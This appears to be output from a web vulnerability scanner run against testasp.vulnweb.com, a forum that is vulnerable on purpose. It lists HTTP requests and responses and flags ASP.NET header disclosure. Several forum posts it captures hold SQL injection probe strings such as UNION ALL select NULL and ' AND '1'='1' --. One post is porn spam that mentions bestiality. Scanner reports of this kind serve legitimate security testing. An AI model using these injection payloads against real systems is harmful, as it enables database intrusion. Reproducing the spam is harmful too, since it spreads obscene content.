| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4151 |
| Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4151 |
| Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4132 |
| Response Body - size: 4,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4131 |
| Response Body - size: 4,131 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>sa19agqc</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4440 |
| Response Body - size: 4,440 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot galleries, daily updated collections </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot galleries, daily updated collections </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>victoriadi1</b> on 3/13/2022 10:23:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot galleries, daily updated collections - 185.220.101.65</div><div class='posttext'>Sexy photo galleries, daily updated pics http://freeponocom.instakink.com/?kiley free guy gay porn mike mo shoes in a porn men fucking animals porn college skinny porn preview 3d porn megasite </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=32 HTTP/1.1
